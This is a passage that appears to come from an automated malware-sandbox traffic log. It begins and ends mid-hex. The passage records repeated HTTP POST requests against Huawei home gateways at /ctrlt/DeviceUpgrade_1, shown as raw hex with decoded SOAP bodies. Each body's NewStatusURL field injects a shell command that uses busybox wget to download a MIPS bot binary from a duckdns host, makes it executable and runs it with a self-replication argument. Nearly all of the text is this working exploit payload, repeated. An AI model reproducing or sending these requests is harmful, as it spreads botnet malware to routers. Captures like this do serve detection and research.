72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 3b 2f 74 6d 70 2f 61 73 63 61 72 69 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g amkbins.duckdns.org -l /tmp/ascaris -r /bins/ascaris.mips;chmod 777 /tmp/ascaris;/tmp/ascaris huawei.selfrep;rm -rf /tmp/ascaris)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 452Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 2e 61 6d 6b 20 2d 72 20 2f 68 75 61 77 65 69 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 61 6d 6b 3b 20 73 68 20 2f 74 6d 70 2f 2e 61 6d 6b 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/.amk -r /huawei; /bin/busybox chmod 777 /tmp/.amk; sh /tmp/.amk)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 3b 2f 74 6d 70 2f 61 73 63 61 72 69 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g amkbins.duckdns.org -l /tmp/ascaris -r /bins/ascaris.mips;chmod 777 /tmp/ascaris;/tmp/ascaris huawei.selfrep;rm -rf /tmp/ascaris)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 3b 2f 74 6d 70 2f 61 73 63 61 72 69 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g amkbins.duckdns.org -l /tmp/ascaris -r /bins/ascaris.mips;chmod 777 /tmp/ascaris;/tmp/ascaris huawei.selfrep;rm -rf /tmp/ascaris)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 